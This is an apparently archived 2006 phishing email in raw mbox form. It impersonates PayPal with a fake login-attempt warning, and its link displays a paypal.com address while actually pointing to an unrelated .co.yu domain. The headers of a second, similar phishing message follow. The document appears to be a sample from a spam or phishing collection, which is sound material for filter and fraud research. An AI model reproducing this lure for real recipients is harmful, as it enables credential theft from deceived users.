From: "PayPal"<security@paypal.com>
Subject: Security Center
Date: Thu, 25 May 2006 09:54:30 -0500
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Message-ID: <BNINFOu9PH3IhA1qfT700000337@bninfo>
X-OriginalArrivalTime: 25 May 2006 16:52:33.0914 (UTC) FILETIME=[9E8CD5A0:01C6801B]
To: undisclosed-recipients:;
Status: 
X-Status: 
X-Keywords:                   

<FONT face="Courier New" size=2>Dear PayPal,<BR><BR>We recently noticed one or more
attempts to log in to your PayPal account<BR>from a foreign IP address.<BR><BR>If you
recently accessed your account while traveling, the unusual log in<BR>attempts may have
been initiated by you. However, if you did not initiate<BR>the log ins, please visit
PayPal as soon as possible to verify your<BR>identity:<BR><BR><A class=m1
href="http://www.zorka-opeka.co.yu/-/" target=_blank><FONT
face="Courier New" color=#0066cc size=2>https://www.paypal.com/us/cgi-bin/webscr?
cmd=_login-run</FONT></A><BR><BR><FONT face="Courier New" size=2>Verify your identity is
a security measure that will ensure that you are<BR>the only person with access to the
account.<BR><BR>Thanks for your patience as we work together to protect your
account.<BR><BR>Sincerely,<BR>PayPal<BR>------------------------------------------------
----------------
<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
PROTECT YOUR PASSWORD<BR><BR>&nbsp;&nbsp; NEVER give your password to anyone and ONLY
log in at<BR></FONT>
<A class=m1 href="http://www.zorka-opeka.co.yu/-/" target=_blank><FONT face="Courier New" color=#0066cc
size=2>https://www.paypal.com/</FONT></A><FONT face="Courier New" size=2>. Protect
yourself against fraudulent websites by<BR>opening a new web browser (e.g. Internet
Explorer or Netscape) and typing<BR>in the PayPal URL every time you log in to your
account.<BR>----------------------------------------------------------------
&nbsp;&nbsp;&nbsp;&nbsp; <BR><BR>Please do not reply to this e-mail. Mail sent to this
address cannot be<BR>answered. For assistance, log in to your PayPal account and choose
the<BR>"Help" link in the header of any page.<BR></FONT><BR><FONT
face="Courier&#13;&#10;New" size=2>PayPal Email ID PP321</FONT></FONT>

From john@localhost.localhost  Thu May 25 13:41:07 2006
Return-Path: <john@localhost.localhost>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by funky.example.com (Postfix) with ESMTP id 252C846AD2
	for <nobody@login.example.com>; Thu, 25 May 2006 13:41:07 -0400 (EDT)
Received: from localhost (unknown [209.12.112.138])
	by mail1.example.com (Postfix) with ESMTP id 78BFA6CCFE7
	for <nobody@example.com>; Thu, 25 May 2006 13:41:06 -0400 (EDT)
Received: by localhost (Postfix, from userid 1031)
	id 0EE8FA3BCC; Thu, 25 May 2006 13:39:48 -0400 (EDT)
To: nobody@example.com
Subject: Restore Your Account Access - nobody@example.com (Routing Code: C840-L1581-Q120-1937)
